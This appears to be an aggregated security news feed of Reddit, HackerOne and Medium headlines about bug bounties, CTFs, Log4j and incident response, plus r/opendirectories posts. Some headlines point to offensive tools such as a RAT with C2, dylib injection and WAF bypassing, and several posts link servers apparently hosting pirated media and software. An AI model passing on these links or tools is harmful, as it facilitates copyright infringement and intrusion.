    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! ​ I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. ​ ​ https://i.redd.it/nblwcs660f981.gif ​ First off, why I made this tool and what the tool does: ​ I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way? To see whether camera is being used or not? If I'm using (for example: Snapchat) to take a picture/video, then can other camera apps on my phone like Tiktok/Kiradroid/WhatsApp camera also be turned on simultaneously ? Is it possible for other camera apps to see what I'm recording on Snapchat? note- On Tiktok's permission : run foreground service is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in intranet?
    Is it generally safe to hide insecure servers(like a REST API server without authentication, no JWT no basic Auth) in intranet(or docker network without publishing the port)? What kind of risk will I be exposed to? Let say I have server A, B and C, and I will publish and expose server A to public, and I only want server B and C to be reached by server A. Is it safe to keep server B and C in intranet(server A will be in that intranet as well, but exposed to public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual sim or cloning ? How can one get proof of this that is admissible as evidence ?
    I am being stalked by my ex pretty sure she has screwed herself a army of tec savy individuals to help her. It’s been almost 2 years I just want to get proof or get her to leave me alone. So if someone was spoofing my phone listening to my calls is it a possibility that if they hung up before I was off the phone I could get a incoming call from the person I was talking to currently and there phone would suddenly start ringing like they called me again ? This phenomena has happened 3-5 times to me before I realized it has only happened sense my ex moved out she somehow had my phone cloned and was following me all over the internet as she could see where I was posting. I don’t think she could modify things on the phone like screen shots but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there one of them the Verizon app that allows you to supposedly hack a phone I of course deleted them. I watched the Google family app appear miraculously onto my phone screen at a concert while Trying to discern if that was my ex standing approximately 40 yards away who should’ve been home with our daughter. I moved into see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and told them outlandish lies to create problems, women I was talking to, follows me all over the internet posting where I post creating accounts where I have accounts all in the name of narc psychopath bs it was bad enough all the cheating that came to light and the mental abuse when we lived together now this shit. Any help would be great thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I’m studying for Sec+, and currently trying to understand the PKI and asymmetric encryption protocols. Say for example I encrypt a message using google’s public key to Google.com, and a MITM intercepts it. Why can’t the MITM decrypt the message using the public key when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
  • Open

    A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain
    A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites. The post A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Intresting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki周刊(第409期) by ourren QingScan: 漏洞扫描器粘合剂 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-03 Review
    SecWiki周刊(第409期) by ourren QingScan: 漏洞扫描器粘合剂 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    跨平台网络安全工具套件CaptfEncoder v3.0.1
    CaptfEncoder 是一款跨平台网络安全工具套件,V3 版本使用Rust开发,可执行程序体积小,速度更快、性能更优、功能更强。  ( 1 min )

  • Open

    Quick question
    I am a novice, please go easy on me for asking this lol. If I am asked to assign an IPv4 to a PC NIC, what does this look like in CLI? Is this the same as simply assigning an IP to the PC itself or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Masters degree, good and cheap ones?
    Don't ask why, I know most companies don't give a crap, I know they prefer experience, etc... Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good masters degree program I can do part time and online (or at least one that is ABET\would make managers who only care about ABET happy). I am both looking at computer science and cybersecurity masters, but I got a B.S. in cybersecurity which makes masters of computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online masters (though I seriously doubt they will let me in the computer science program so I will have to do the cybersecurity one). I keep digging around but it seems all the ones I can find either charge high rates, and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that its that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, And I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact ;
    I am trying to understand how to best prevent bruteforcing attacks on various externally accessible services. If you limit the amount of attempts for a given account, then you solve the bruteforcing quandary but introduce another attack vector where someone can indefintely lock out legitimate users out of their‏‏‎‏‏‎‏‏‎‏‏‎­accounts by just knowing their username. You can limit it by something like IP, but there have been several real world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could identify legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which it was accessed and allow login attempts from that IP even if the user is locked out. However that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake [link] [comments]
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake [link] [comments]  ( 1 min )
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]  ( 1 min )
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    various stuff
    Music (amateuer bands, i guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1 [link] [comments]
  • Open

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell [link] [comments]
  • Open

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva [link] [comments]
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans [link] [comments]  ( 3 min )
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster [link] [comments]
  • Open

    How i was able to bypass a Pin code Protection
    Hello guys,  I Hope all are doing good. my name is kerolos sameh(AKA xko2x) , I’m 17 years old bug hunter in hackerone. Continue reading on Medium »  ( 2 min )
    He is already here: Privileges escalation due to invalidating current users
    Dear his/her we back again our story today is about privileges escalation This vulnerability enables the unauthorized user to add an… Continue reading on Medium »  ( 2 min )
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »  ( 2 min )
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem.. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »  ( 6 min )
  • Open

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation-爬虫 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation-爬虫 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »  ( 2 min )
  • Open

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »  ( 3 min )
  • Open

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006 [link] [comments]  ( 1 min )
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1 [link] [comments]  ( 1 min )
  • Open

    [译] [论文] BBR:基于拥塞(而非丢包)的拥塞控制(ACM, 2017)
    译者序 本文翻译自 Google 2017 的论文: Cardwell N, Cheng Y, Gunn CS, Yeganeh SH, Jacobson V. BBR: congestion-based congestion control. Communications of the ACM. 2017 Jan 23;60(2):58-66. 论文副标题:Measuring Bottleneck Bandwidth and Round-trip propagation time(测量瓶颈带宽和往返传输时间)。 BBR 之前,主流的 TCP 拥塞控制算法都是基于丢包(loss-based)设计的, 这一假设最早可追溯到上世纪八九十年代,那时的链路带宽和内存容量分别以 Mbps 和 KB 计,链路质量(以今天的标准来说)也很差。 三十年多后,这两个物理容量都已经增长了至少六个数量级,链路质量也不可同日而语。特别地,在现代基础设施中, 丢包和延迟不一定表示网络发生了拥塞,因此原来的假设已经不再成立。 Google 的网络团队从这一根本问题出发,(在前人工作的基础上) 设计并实现了一个基于拥塞本身而非基于丢包或延迟的拥塞控制新算法,缩写为 BBR。 简单来说,BBR 通过应答包(ACK)中的 RTT 信息和已发送字节数来计算 真实传输速率(delivery rate),然后根据后者来调节客户端接下来的 发送速率(sending rate),通过保持合理的 inflight 数据量来使 传输带宽最大、传输延迟最低。另外,它完全运行在发送端,无需协议、 接收端或网络的改动,因此落地相对容易。 Google 的全球广域网(B4)在 2016 年就已经将全部 TCP 流量从 CUBIC 切换到 BBR, 吞吐提升了 2~25 倍;在做了一些配置调优之后,甚至进一步提升到了 133 倍(…

  • Open

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12  ( 4 min )
  • Open

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana [link] [comments]  ( 1 min )
    My First Contribution
    Heres a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321 [link] [comments]
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    iron maiden alnums zipped -(SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    OSINT NEDİR?
    OSINT(Open Source Intelligence) yani açık kaynak istihbaratı anlamına gelmektedir. Kısaca pasif bilgi toplama aracıdır diyebiliriz. Pasif… Continue reading on Medium »  ( 2 min )
  • Open

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »  ( 5 min )
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »  ( 3 min )
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »  ( 5 min )
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »  ( 1 min )
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »  ( 3 min )
  • Open

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49  ( 3 min )
  • Open

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu [link] [comments]  ( 1 min )
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj [link] [comments]  ( 1 min )
  • Open

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell [link] [comments]
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor [link] [comments]
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-01-01 Review
    2021年安全架构总结以及2022安全方向展望 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-01-01 Review
    2021年安全架构总结以及2022安全方向展望 by ourren 更多最新文章,请访问SecWiki
  • Open

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1s network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work, I understand that it's class B which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated thank you! submitted by /u/crumbjuice [link] [comments]  ( 2 min )
  • Open

    如何使用ChopChop扫描终端并识别暴露的敏感内容
    帮助广大研究人员针对Web应用程序进行动态应用程序测试。  ( 1 min )

  • Open

    나의 메인 Weapon 이야기 ⚔️ (ZAP and Proxify)
    한국 기준으로 새해까지 약 30분이 남았고, 올해의 글은 이 글이 마지막 글이 될 것 같습니다. 분명 2020 회고한지가 얼마 안된 것 같은데, 벌써 2021도 회고도 이미 지나버렸네요 😱 오늘은 제 회고 내용 중 하나인 Main Weapon에 대한 이야기를 하려고 합니다 :D Main Weapon? 여러분들은 분석 시 어떤 도구를 제일 좋아하시나요? 여기서 하나 고를 수 있는 도구를 저는 Main Weapon이라고 생각합니다. 저는 긴 시간 동안 Burpsuite 유저였었고, 2018년 정도부터 ZAP에 다시 관심이 크게 생겼고 결국 작년까지는 Burpsuite와 ZAP을 동시에 사용하는 듀얼 스타일을 고수했었습니다.
  • Open

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP Ports on my ISPs Routers Firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doen't have much options besides disiabling Incoming & outgoing and setting custom rules. Should I just disable Incoming ICMP? What can i do If anything that will increase security of ICMP. submitted by /u/Wind0ze_User [link] [comments]  ( 2 min )
    Tiktok
    1.Is it true that TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3 . Is this is true, then how is that even legal to spy on users? Especially, minors who use this app more. submitted by /u/hamza_37 [link] [comments]  ( 3 min )
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from playstore or not? I downloaded many strange apps from google playstore ,uninstalled them and ran a Malwarebytes scan and nothing bad showed up, should I still be worried? submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    About blockchain dapps security
    Hello I m a pen testing student doing my oscp right now and I m interested in blockchain and dapp security-pentesting. Is there a roadmap? what skills I must acquire to get me there besides learning a dapp language like plutus or solidity? Thanks in advance! submitted by /u/GeorgiosSAK [link] [comments]  ( 1 min )
  • Open

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 8 min )
    OSINT tweets liked by @aqfiazfan in Jan — Des 2021
    Saya selalu menjadikan fitur likes di twitter sebagai lemari penting untuk menyimpan informasi terkait OSINT yang menurut saya menarik… Continue reading on Medium »  ( 1 min )
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »  ( 5 min )
  • Open

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 10 min )
  • Open

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard [link] [comments]  ( 1 min )
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more stuff since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB ​ submitted by /u/techleves [link] [comments]  ( 1 min )
    Top 25o imdb movies-But see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1 [link] [comments]
    runaways comics
    submitted by /u/International_Milk_1 [link] [comments]
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Comics - Google Drive (lets see if this last any longer)
    submitted by /u/International_Milk_1 [link] [comments]
    some vertigo comics
    submitted by /u/International_Milk_1 [link] [comments]
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13 [link] [comments]  ( 1 min )
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn [link] [comments]
  • Open

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
  • Open

    Javascript 101 — Comparison & Conditions — 04
